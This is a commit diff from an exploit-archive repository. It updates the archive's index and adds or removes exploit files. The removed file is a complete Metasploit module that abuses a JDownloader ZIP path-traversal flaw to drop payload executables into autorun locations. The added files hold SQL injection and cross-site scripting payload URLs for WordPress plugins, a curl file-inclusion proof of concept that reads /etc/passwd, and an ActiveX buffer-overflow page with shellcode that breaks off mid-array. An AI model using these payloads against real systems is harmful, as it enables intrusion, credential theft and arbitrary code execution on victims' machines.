DB: 2015-06-06

11 new exploits
2015-06-06 05:03:13 +00:00 · 2015-06-06 05:03:13 +00:00 · 709da32ec5
commit 709da32ec5
parent d811002c6b
16 changed files with 286 additions and 330 deletions
--- a/files.csv
+++ b/files.csv
@ -27,7 +27,7 @@ id,file,description,date,author,platform,type,port
 26,platforms/linux/remote/26.sh,"OpenSSH/PAM <= 3.6.1p1 - Remote Users Ident (gossh.sh)",2003-05-02,"Nicolas Couture",linux,remote,0
 27,platforms/linux/remote/27.pl,"CommuniGate Pro Webmail 4.0.6 Session Hijacking Exploit",2003-05-05,"Yaroslav Polyakov",linux,remote,80
 28,platforms/windows/remote/28.c,"Kerio Personal Firewall 2.1.4 - Remote Code Execution Exploit",2003-05-08,Burebista,windows,remote,0
-29,platforms/bsd/local/29.c,"Firebird 1.0.2 FreeBSD 4.7-RELEASE Local Root Exploit",2003-05-12,bob,bsd,local,0
+29,platforms/bsd/local/29.c,"Firebird 1.0.2 FreeBSD 4.7-RELEASE - Local Root Exploit",2003-05-12,bob,bsd,local,0
 30,platforms/windows/remote/30.pl,"Snitz Forums 3.3.03 - Remote Command Execution Exploit",2003-05-12,N/A,windows,remote,0
 31,platforms/linux/local/31.pl,"CdRecord <= 2.0 - Mandrake Local Root Exploit",2003-05-14,N/A,linux,local,0
 32,platforms/windows/local/32.c,"Microsoft Windows XP (explorer.exe) - Buffer Overflow Exploit",2003-05-21,einstein,windows,local,0
@ -53,7 +53,7 @@ id,file,description,date,author,platform,type,port
 52,platforms/windows/local/52.asm,"ICQ Pro 2003a Password Bypass Exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0
 53,platforms/cgi/webapps/53.c,"CCBILL CGI Remote Exploit for whereami.cgi (ccbillx.c)",2003-07-10,knight420,cgi,webapps,0
 54,platforms/windows/remote/54.c,"LeapFTP 2.7.x - Remote Buffer Overflow Exploit",2003-07-12,drG4njubas,windows,remote,21
-55,platforms/linux/remote/55.c,"Samba 2.2.8 (Bruteforce Method) Remote Root Exploit",2003-07-13,Schizoprenic,linux,remote,139
+55,platforms/linux/remote/55.c,"Samba 2.2.8 - (Bruteforce Method) Remote Root Exploit",2003-07-13,Schizoprenic,linux,remote,139
 56,platforms/windows/remote/56.c,"Microsoft Windows Media Services - (nsiislog.dll) Remote Exploit",2003-07-14,N/A,windows,remote,80
 57,platforms/solaris/remote/57.txt,"Solaris 2.6/7/8 (TTYPROMPT in.telnet) Remote Authentication Bypass",2002-11-02,"Jonathan S.",solaris,remote,0
 58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 - Remote Exploit",2003-07-17,"Carl Livitt",linux,remote,504
@ -3236,7 +3236,7 @@ id,file,description,date,author,platform,type,port
 3575,platforms/windows/remote/3575.cpp,"Frontbase <= 4.2.7 - Remote Buffer Overflow Exploit (windows)",2007-03-25,Heretic2,windows,remote,0
 3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL phpDOC Local Buffer Overflow Exploit",2007-03-25,rgod,windows,local,0
 3577,platforms/windows/remote/3577.html,"Microsoft Internet Explorer - Recordset Double Free Memory Exploit (MS07-009)",2007-03-26,N/A,windows,remote,0
-3578,platforms/bsd/local/3578.c,"FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit",2007-03-26,harry,bsd,local,0
+3578,platforms/bsd/local/3578.c,"FreeBSD mcweject 0.9 (eject) - Local Root Buffer Overflow Exploit",2007-03-26,harry,bsd,local,0
 3579,platforms/windows/remote/3579.py,"Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit (Win2K SP4)",2007-03-26,"Winny Thomas",windows,remote,21
 3580,platforms/php/webapps/3580.pl,"IceBB 1.0-rc5 - Remote Create Admin Exploit",2007-03-26,Hessam-x,php,webapps,0
 3581,platforms/php/webapps/3581.pl,"IceBB 1.0-rc5 - Remote Code Execution Exploit",2007-03-26,Hessam-x,php,webapps,0
@ -8564,7 +8564,7 @@ id,file,description,date,author,platform,type,port
 9079,platforms/php/webapps/9079.txt,"Opial 1.0 (Auth Bypass) Remote SQL Injection Vulnerability",2009-07-02,Moudi,php,webapps,0
 9080,platforms/php/webapps/9080.txt,"Opial 1.0 (albumid) Remote SQL Injection Vulnerability",2009-07-02,"ThE g0bL!N",php,webapps,0
 9081,platforms/php/webapps/9081.txt,"Rentventory Multiple Remote SQL Injection Vulnerabilities",2009-07-02,Moudi,php,webapps,0
-9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount Local Privilege Escalation Exploit",2009-07-09,"Patroklos Argyroudis",freebsd,local,0
+9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Local Privilege Escalation Exploit",2009-07-09,"Patroklos Argyroudis",freebsd,local,0
 9083,platforms/linux/local/9083.c,"Linux Kernel <= 2.6.28.3 - set_selection() UTF-8 Off By One Local Exploit",2009-07-09,sgrakkyu,linux,local,0
 9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution PoC",2009-07-09,"laurent gaffiÃ© ",windows,dos,0
 9085,platforms/multiple/dos/9085.txt,"MySQL <= 5.0.45 COM_CREATE_DB Format String PoC (auth)",2009-07-09,kingcope,multiple,dos,0
@ -8952,7 +8952,7 @@ id,file,description,date,author,platform,type,port
 9485,platforms/php/webapps/9485.txt,"Cuteflow 2.10.3 edituser.php Security Bypass Vulnerability",2009-08-24,"Hever Costa Rocha",php,webapps,0
 9486,platforms/windows/local/9486.pl,"KSP 2006 FINAL (.M3U) Universal Local Buffer Exploit (SEH)",2009-08-24,hack4love,windows,local,0
 9487,platforms/windows/dos/9487.pl,"Faslo Player 7.0 - (.m3u) Local Buffer Overflow PoC",2009-08-24,hack4love,windows,dos,0
-9488,platforms/freebsd/local/9488.c,"FreeBSD <= 6.1 kqueue() NULL pointer Dereference Local Root Exploit",2009-08-24,"Przemyslaw Frasunek",freebsd,local,0
+9488,platforms/freebsd/local/9488.c,"FreeBSD <= 6.1 - kqueue() NULL pointer Dereference Local Root Exploit",2009-08-24,"Przemyslaw Frasunek",freebsd,local,0
 9489,platforms/multiple/local/9489.txt,"Multiple BSD Operating Systems setusercontext() Vulnerabilities",2009-08-24,kingcope,multiple,local,0
 9490,platforms/php/webapps/9490.txt,"Lanai Core 0.6 - Remote File Disclosure / Info Disclosure Vulns",2009-08-24,IRCRASH,php,webapps,0
 9491,platforms/php/webapps/9491.txt,"Dow Group (new.php) SQL Injection",2009-11-16,ProF.Code,php,webapps,0
@ -14748,7 +14748,7 @@ id,file,description,date,author,platform,type,port
 16948,platforms/php/webapps/16948.txt,"Esselbach Storyteller CMS System 1.8 - SQL Injection Vulnerability",2011-03-09,Shamus,php,webapps,0
 16949,platforms/php/webapps/16949.php,"maian weblog <= 4.0 - Remote Blind SQL Injection",2011-03-09,mr_me,php,webapps,0
 16950,platforms/php/webapps/16950.txt,"recordpress 0.3.1 - Multiple Vulnerabilities",2011-03-09,IRCRASH,php,webapps,0
-16951,platforms/bsd/local/16951.c,"FreeBSD <= 6.4 Netgraph Local Privledge Escalation Exploit",2011-03-10,zx2c4,bsd,local,0
+16951,platforms/bsd/local/16951.c,"FreeBSD <= 6.4 - Netgraph Local Privledge Escalation Exploit",2011-03-10,zx2c4,bsd,local,0
 16952,platforms/linux/dos/16952.c,"Linux Kernel < 2.6.37-rc2 TCP_MAXSEG Kernel Panic DoS",2011-03-10,zx2c4,linux,dos,0
 16953,platforms/asp/webapps/16953.txt,"Luch Web Designer Multiple SQL Injection Vulnerabilities",2011-03-10,p0pc0rn,asp,webapps,0
 16954,platforms/php/webapps/16954.txt,"Keynect Ecommerce SQL Injection Vulnerability",2011-03-10,"Arturo Zamora",php,webapps,0
@ -23500,7 +23500,7 @@ id,file,description,date,author,platform,type,port
 26365,platforms/php/webapps/26365.txt,"MySource 2.14 Request.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
 26366,platforms/php/webapps/26366.txt,"GLPI 0.83.8 - Multiple Vulnerabilities",2013-06-21,LiquidWorm,php,webapps,0
 26367,platforms/windows/local/26367.py,"Adrenalin Player 2.2.5.3 - (.asx) SEH Buffer Overflow",2013-06-21,Onying,windows,local,0
-26368,platforms/freebsd/local/26368.c,"FreeBSD 9.0-9.1 mmap/ptrace - Privilege Esclation Exploit",2013-06-21,Hunger,freebsd,local,0
+26368,platforms/freebsd/local/26368.c,"FreeBSD 9.0-9.1 mmap/ptrace - Privilege Escalation Exploit",2013-06-21,Hunger,freebsd,local,0
 26369,platforms/php/webapps/26369.txt,"MySource 2.14 Mail.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
 26370,platforms/php/webapps/26370.txt,"MySource 2.14 Date.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
 26371,platforms/php/webapps/26371.txt,"MySource 2.14 Span.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
@ -23586,7 +23586,7 @@ id,file,description,date,author,platform,type,port
 26451,platforms/linux/local/26451.rb,"ZPanel zsudo - Local Privilege Escalation Exploit",2013-06-26,metasploit,linux,local,0
 26452,platforms/win32/local/26452.rb,"Novell Client 2 SP3 nicm.sys Local Privilege Escalation",2013-06-26,metasploit,win32,local,0
 26453,platforms/php/webapps/26453.py,"PHP Charts 1.0 (index.php type param) - Remote Code Execution",2013-06-26,infodox,php,webapps,0
-26454,platforms/freebsd/local/26454.rb,"FreeBSD 9 Address Space Manipulation Privilege Escalation",2013-06-26,metasploit,freebsd,local,0
+26454,platforms/freebsd/local/26454.rb,"FreeBSD 9 - Address Space Manipulation Privilege Escalation",2013-06-26,metasploit,freebsd,local,0
 26455,platforms/php/webapps/26455.txt,"VUBB Index.PHP Cross-Site Scripting Vulnerability",2005-11-01,"Alireza Hassani",php,webapps,0
 26456,platforms/php/webapps/26456.txt,"XMB Forum 1.9.3 Post.PHP SQL Injection Vulnerability",2005-11-01,almaster,php,webapps,0
 26457,platforms/windows/dos/26457.txt,"Microsoft Internet Explorer 6.0 Malformed HTML Parsing Denial of Service Vulnerability",2005-11-01,ad@class101.org,windows,dos,0
@ -33577,6 +33577,17 @@ id,file,description,date,author,platform,type,port
 37194,platforms/php/webapps/37194.txt,"Mingle Forum 1.0.33 'admin.php' Multiple Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
 37195,platforms/php/webapps/37195.txt,"WP Forum Server Plugin 1.7.3 for WordPress fs-admin/fs-admin.php Multiple Parameter XSS",2012-05-15,"Heine Pedersen",php,webapps,0
 37196,platforms/php/webapps/37196.txt,"Pretty Link Lite WordPress Plugin 1.5.2 SQL Injection and Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
-37198,platforms/multiple/webapps/37198.rb,"JDownloader 2 Beta Directory Traversal Vulnerability",2015-06-04,PizzaHatHacker,multiple,webapps,0
+37198,platforms/multiple/remote/37198.rb,"JDownloader 2 Beta - Directory Traversal Vulnerability",2015-06-04,PizzaHatHacker,multiple,remote,0
 37199,platforms/hardware/dos/37199.txt,"ZTE AC 3633R USB Modem Multiple Vulnerabilities",2015-06-04,Vishnu,hardware,dos,0
 37200,platforms/php/webapps/37200.txt,"WordPress zM Ajax Login & Register Plugin 1.0.9 Local File Inclusion",2015-06-04,"Panagiotis Vagenas",php,webapps,80
 37201,platforms/php/webapps/37201.txt,"WordPress Sharebar Plugin 1.2.1 SQL Injection and Cross Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0
 37202,platforms/php/webapps/37202.txt,"Share and Follow 1.80.3 'admin.php' Cross Site Scripting Vulnerability",2012-05-15,"Heine Pedersen",php,webapps,0
 37203,platforms/php/webapps/37203.txt,"WordPress Soundcloud Is Gold 2.1 'width' Parameter Cross Site Scripting Vulnerability",2012-05-15,"Heine Pedersen",php,webapps,0
 37204,platforms/php/webapps/37204.txt,"WordPress Track That Stat 1.0.8 Cross Site Scripting Vulnerability",2012-05-15,"Heine Pedersen",php,webapps,0
 37205,platforms/php/webapps/37205.txt,"LongTail JW Player 'debug' Parameter Cross Site Scripting Vulnerability",2012-05-16,gainover,php,webapps,0
 37206,platforms/php/webapps/37206.txt,"SiliSoftware phpThumb() 1.7.11-201108081537 demo/phpThumb.demo.showpic.php title Parameter XSS",2012-05-16,"Gjoko Krstic",php,webapps,0
 37207,platforms/php/webapps/37207.txt,"SiliSoftware phpThumb() 1.7.11-201108081537 demo/phpThumb.demo.random.php dir Parameter XSS",2012-05-16,"Gjoko Krstic",php,webapps,0
 37208,platforms/php/webapps/37208.txt,"backupDB() 1.2.7a 'onlyDB' Parameter Cross Site Scripting Vulnerability",2012-05-16,LiquidWorm,php,webapps,0
 37209,platforms/php/webapps/37209.txt,"Wordpress Really Simple Guest Post <= 1.0.6 - File Include",2015-06-05,Kuroi'SH,php,webapps,0
 37211,platforms/windows/local/37211.html,"1 Click Audio Converter 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,windows,local,0
 37212,platforms/windows/local/37212.html,"1 Click Extract Audio 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,windows,local,0
--- a/platforms/multiple/webapps/37198.rb
+++ b/platforms/multiple/webapps/37198.rb
@ -1,263 +0,0 @@
 =begin
 # Exploit Title: JDownloader 2 Beta Directory Traversal Vulnerability (Zip Extraction)
 # Date: 2015-06-02
 # Exploit Author: PizzaHatHacker
 # Vendor Homepage: http://jdownloader.org/home/index
 # Software Link: http://jdownloader.org/download/offline
 # Version: 1171 <= SVN Revision <= 2331
 # Contact: PizzaHatHacker[a]gmail[.]com
 # Tested on: Windows XP SP3 / Windows 7 SP1
 # CVE: 
 # Category: remote
 1. Product Description
 Extract from the official website :
 "JDownloader is a free, open-source download management tool with a huge community of developers that makes downloading as easy and fast as it should be. Users can start, stop or pause downloads, set bandwith limitations, auto-extract archives and much more. It's an easy-to-extend framework that can save hours of your valuable time every day!"
 2. Vulnerability Description & Technical Details
 JDownloader 2 Beta is vulnerable to a directory traversal security issue.
 Class : org.appwork.utils.os.CrossSystem
 Method : public static String alleviatePathParts(String pathPart)
 This method is called with a user-provided path part as parameter,
 and should return a valid and safe path where to create a file/folder.
 This method first checks that the input filepath does not limit
 itself to a (potentially dangerous) sequence of dots and otherwise 
 removes it :
 pathPart = pathPart.replaceFirst("\\.+$", "");
 However right after this, the value returned is cleaned from
 starting and ending white space characters :
 return pathPart.trim();
 Therefore, if you pass to this method a list of dots followed by some white space
 like "..  ", it will bypass the first check and then return the valid path ".."
 which is insecure.
 This leads to a vulnerability when JDownloader 2 Beta just downloaded a ZIP file and
 then tries to extract it. A ZIP file with an entry containing ".. " sequence(s) 
 would cause JD2b to overwrite/create arbitrary files on the target filesystem.
 3. Impact Analysis :
 To exploit this issue, the victim is required to launch a standard ZIP file download.
 The Unzip plugin is enabled by default in JDownloader : any ZIP file downloaded will
 automatically be extracted.
 By exploiting this issue, a malicious user may be able to create/overwrite arbitrary
 files on the target file system.
 Therefore, it is possible to take the control of the victim's machine with the rights of
 the JDownloader process - typically standard (non-administrator) rights - for example by
 overwriting existing executable files, by uploading an executable file in a user's
 autorun directory etc.
 4. Common Vulnerability Scoring System
 * Exploitability Metrics
 - Access Vector (AV) : Network (AV:N)
 - Access Complexity (AC) : Medium (AC:M)
 - Authentication (Au) : None (Au:N)
 * Impact Metrics
 - Confidentiality Impact (C) : Partial (C:P)
 - Integrity Impact (I) : Partial (I:P)
 - Availability Impact (A) : Partial (A:P)
 * CVSS v2 Vector (AV:N/AC:M/Au:N/C:P/I:P/A:P)
 - CVSS Base Score : 6.8
 - Impact Subscore 6.4
 - Exploitability Subscore 8.6
 5. Proof of Concept
 - Create a ZIP file with an entry like ".. /poc.txt"
 - Upload it to an HTTP server (for example)
 - Run a vulnerable revision of JDownloader 2 Beta and use it to download the file from the server
 - JD2b will download and extract the file, which will create a "poc.txt" one level upper from your download directory
 OR see the Metasploit Exploit provided.
 6. Vulnerability Timeline
 2012-04-27 : Vulnerability created (SVN Revision > 1170)
 2014-08-19 : Vulnerability identified
 [...]      : Sorry, I was not sure how to handle this and forgot about it for a long time
 2015-05-08 : Vendor informed about this issue
 2015-05-08 : Vendor response + Code modification (Revision 2332)
 2015-05-11 : Code modification (SVN Revision 2333)
 2015-05-11 : Notified the vendor : The vulnerable code is still exploitable via ".. .." (dot dot blank dot dot)
 2015-05-12 : Code modification (SVN Revision 2335)
 2015-05-12 : Confirmed to the vendor that the code looks now safe
 2015-06-01 : JDownloader 2 Beta Update : Looks not vulnerable anymore
 2015-06-04 : Disclosure of this document
 7. Solution
 Update JDownloader 2 Beta to the latest version.
 8. Personal Notes
 I am NOT a security professional, just a kiddy fan of security.
 I was boring so I looked for some security flaws in some software and happily found this.
 If you have any questions/remarks, don't hesitate to contact me by email.
 I'm interesting in any discussion/advice/exchange/question/criticism about security/exploits/programming :-)
 =end
 ##
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
 require 'rex'
 class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
  def initialize( info = {} )
    super( update_info( info,
      'Name'          => 'JDownloader 2 Beta Directory Traversal Vulnerability',
      'Description'   => %q{
        This module exploits a directory traversal flaw in JDownloader 2 Beta 
        when extracting a ZIP file (which by default is automatically done by JDL).
        The following targets are available :
        Windows regular user : Create executable file in the 'Start Menu\Startup'
        under the user profile directory. (Executed at next session startup).
        Linux regular user : Create an executable file and a .profile script calling
        it in the user's home directory. (Executed at next session login).
        Windows Administrator : Create an executable file in C:\\Windows\\System32
        and a .mof file calling it. (Executed instantly).
        Linux Administrator : Create an executable file in /etc/crontab.hourly/.
        (Executed within the next hour).
 		Vulnerability date : Apr 27 2012 (SVN Revision > 1170)
      },
      'License'       => MSF_LICENSE,
      'Author'        => [ 'PizzaHatHacker <PizzaHatHacker[A]gmail[.]com>' ], # Vulnerability Discovery & Metasploit module
      'References'    =>
      [
        [ 'URL', 'http://jdownloader.org/download/offline' ],
      ],
      'Platform'      => %w{ linux osx solaris win },
      'Payload'       => {
        'Space' => 20480, # Arbitrary big number
        'BadChars' => '',
        'DisableNops' => true
    },
      'Targets'       =>
        [
          [ 'Windows Regular User (Start Menu Startup)',
            {
              'Platform'     => 'win',
              'Depth'        => 0, # Go up to root (C:\Users\Joe\Downloads\..\..\..\ -> C:\)
              'RelativePath' => 'Users/All Users/Microsoft/Windows/Start Menu/Programs/Startup/',
              'Option'       => nil,
            }
          ],
          [ 'Linux Regular User (.profile)',
            {
              'Platform'     => 'linux',
              'Depth'        => -2, # Go up 2 levels (/home/joe/Downloads/XXX/xxx.zip -> /home/joe/)
              'RelativePath' => '',
              'Option'       => 'profile',
            }
          ],
          [ 'Windows Administrator User (Wbem Exec)',
            {
              'Platform'     => 'win',
              'Depth'        => 0, # Go up to root (n levels)
              'RelativePath' => 'Windows/System32/',
              'Option'       => 'mof',
            }
          ],
          [ 'Linux Administrator User (crontab)',
            {
              'Platform'  => 'linux',
              'Depth'        => 0, # Go up to root (n levels)
              'RelativePath' => 'etc/cron.hourly/',
              'Option'       => nil,
            }
          ],
        ],
      'DefaultTarget'  => nil,
      'DisclosureDate' => ''
      ))
    register_options(
      [
        OptString.new('FILENAME', [ true, 'The output file name.', '']),
         # C:\Users\Bob\Downloads\XXX\xxx.zip  => 4
         # /home/Bob/Downloads/XXX/xxx.zip     => 4
         OptInt.new('DEPTH', [true, 'JDownloader download directory depth. (0 = filesystem root, 1 = one subfolder under root etc.)', 4]),
      ], self.class)
 register_advanced_options(
   [
     OptString.new('INCLUDEDIR', [ false, 'Path to an optional directory to include into the archive.', '']),
   ], self.class)
  end
  # Traversal path
  def traversal(depth)
    result = '.. /'
    if depth < 0
      # Go up n levels
      result = result * -depth
    else
      # Go up until n-th level
      result = result * (datastore['DEPTH'] - depth)
    end
    return result
  end
  def exploit
    # Create a new archive
    zip = Rex::Zip::Archive.new
    # Optionally include an initial directory
    dir = datastore['INCLUDEDIR']
    if not dir.nil? and not dir.empty?
      print_status("Filling archive recursively from path #{dir}")
      zip.add_r(dir)
    end
    # Create the payload executable file path
    exe_name = rand_text_alpha(rand(6) + 1) + (target['Platform'] == 'win' ? '.exe' : '')
    exe_file = traversal(target['Depth']) + target['RelativePath'] + exe_name
    # Generate the payload executable file content
    exe_content = generate_payload_exe()
    # Add the payload executable file into the archive
    zip_add_file(zip, exe_file, exe_content)
    # Check all available targets
    case target['Option']
    when 'mof'
      # Create MOF file data
        mof_name = rand_text_alpha(rand(6) + 1) + '.mof'
        mof_file = traversal(0) + 'Windows\\System32\\Wbem\\Mof\\' + mof_name
        mof_content = generate_mof(mof_name, exe_name)
        zip_add_file(zip, mof_file, mof_content)
    when 'profile'
      # Create .profile file
      bashrc_name = '.profile'
      bashrc_file = traversal(target['Depth']) + bashrc_name
      bashrc_content = "chmod a+x ./#{exe_name}\n./#{exe_name}"
      zip_add_file(zip, bashrc_file, bashrc_content)
    end
    # Write the final ZIP archive to a file
    zip_data = zip.pack
    file_create(zip_data)
  end
  # Add a file to the target zip and output a notification
  def zip_add_file(zip, filename, content)
    print_status("Adding '#{filename}' (#{content.length} bytes)");
    zip.add_file(filename, content, nil, nil, nil)
  end
 end
--- a/platforms/php/webapps/37201.txt
+++ b/platforms/php/webapps/37201.txt
@ -0,0 +1,11 @@
 source: http://www.securityfocus.com/bid/53532/info
 Sharebar plugin for WordPress is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
 Successful exploits will allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 Sharebar 1.2.1 is vulnerable; other versions may also be affected. 
 http://www.example.com/wp-admin/options-general.php?page=Sharebar&amp;t=edit&amp;id=1 AND 1=0 UNION SELECT 1,2,3,4,user_pass,6 FROM wp_users WHERE ID=1
 http://www.example.com/wp-content/plugins/sharebar/sharebar-admin.php?status=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 
--- a/platforms/php/webapps/37202.txt
+++ b/platforms/php/webapps/37202.txt
@ -0,0 +1,10 @@
 source: http://www.securityfocus.com/bid/53533/info
 The Share and Follow plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 Share and Follow 1.80.3 is vulnerable; other versions may also be affected. 
 http://www.example.com/wp-admin/admin.php?page=share-and-follow-menu
 CDN API Key content: &quot;&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt; 
--- a/platforms/php/webapps/37203.txt
+++ b/platforms/php/webapps/37203.txt
@ -0,0 +1,11 @@
 source: http://www.securityfocus.com/bid/53537/info
 The Soundcloud Is Gold plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 Soundcloud Is Gold 2.1 is vulnerable; other versions may also be affected. 
 http://www.example.com/wp-admin/admin-ajax.php
 POSTDATA: action=soundcloud_is_gold_player_preview&request=1&width="></iframe><script>alert(1)</script>
--- a/platforms/php/webapps/37204.txt
+++ b/platforms/php/webapps/37204.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/53551/info
 The Track That Stat plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 Track That Stat 1.0.8 is vulnerable; other versions may also be affected. 
 http://www.example.com/wp.bacon/wp-content/plugins/track-that-stat/js/trackthatstat.php?data=PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B 
--- a/platforms/php/webapps/37205.txt
+++ b/platforms/php/webapps/37205.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/53554/info
 JW Player is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
 http://www.example.com/player.swf?debug=function(){alert('Simple Alert')} 
--- a/platforms/php/webapps/37206.txt
+++ b/platforms/php/webapps/37206.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/53572/info
 phpThumb() is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 phpThumb() 1.7.11-201108081537 is vulnerable; other versions may also be affected. 
 GET [SOME_CMS]/phpthumb/demo/phpThumb.demo.showpic.php?title="><script>alert(document.cookie);</script> HTTP/1.1 
--- a/platforms/php/webapps/37207.txt
+++ b/platforms/php/webapps/37207.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/53572/info
 phpThumb() is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 phpThumb() 1.7.11-201108081537 is vulnerable; other versions may also be affected. 
 GET [SOME_CMS]/phpthumb/demo/phpThumb.demo.random.php?dir="><script>alert(document.cookie);</script> HTTP/1.1 
--- a/platforms/php/webapps/37208.txt
+++ b/platforms/php/webapps/37208.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/53575/info
 backupDB() is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
 backupDB() 1.2.7a is vulnerable; other versions may also be affected.
 http://www.example.com/backupDB/backupDB.php?onlyDB="><script>alert(document.cookie);</script> 
--- a/platforms/php/webapps/37209.txt
+++ b/platforms/php/webapps/37209.txt
@ -0,0 +1,27 @@
 # Exploit Title: Wordpress Really Simple Guest Post File Include
 # Google Dork: inurl:"really-simple-guest-post" intitle:"index of"
 # Date: 04/06/2015
 # Exploit Author: Kuroi'SH
 # Software Link: https://wordpress.org/plugins/really-simple-guest-post/
 # Version: <=1.0.6
 # Tested on: Linux
 The vulnerable file is called:
 simple-guest-post-submit.php and its full path is
 /wp-content/plugins/really-simple-guest-post/simple-guest-post-submit.php
 The vulnerable code is as follows:
 (line 8)
 require_once($_POST["rootpath"]);
 As you can see, the require_once function includes a data based on
 user-input without any prior verification.
 So, an attacker can exploit this flaw and come directly into the url
 /wp-content/plugins/really-simple-guest-post/simple-guest-post-submit.php
 and send a post data like: "rootpath=the_file_to_include"
 Proof of concept:
 curl -X POST -F "rootpath=/etc/passwd" --url
 http://localhost/wp-content/plugins/really-simple-guest-post/simple-guest-post-submit.php
 which will print out the content of /etc/passwd file.
 Greats to Black Sniper & Moh Ooasiic
 by Kuroi'SH
--- a/platforms/windows/local/37211.html
+++ b/platforms/windows/local/37211.html
@ -0,0 +1,53 @@
 <html>
 <br>1 Click Audio Converter Activex Buffer Overflow</br>
 <br>Affected version=2.3.6</br>
 <br>Vendor Homepage:http://www.dvdvideotool.com/index.htm</br>
 <br>Software Link:www.dvdvideotool.com/1ClickAudioConverter.exe</br>
 <br>The vulnerability lies in the COM component used by the product SkinCrafter.dll </br>
 <br>SkinCrafter.dll version.1.9.2.0</br>
 <br>Vulnerability tested on Windows Xp Sp3 (EN),with IE6</br>
 <br>Author: metacom</br>
 <!--Video Poc: http://bit.ly/1GmOAyq -->
 <object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' ></object>
 <script >
 junk1 = "";
 while(junk1.length < 2048) junk1+="A";
 nseh = "\xeb\x06\x90\x90";
 seh = "\xD7\x51\x04\x10";
 nops= "";
 while(nops.length < 50) nops+="\x90";
 shellcode =(
 "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
 "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
 "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
 "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
 "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"+
 "\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"+
 "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"+
 "\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"+
 "\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"+
 "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"+
 "\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"+
 "\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"+
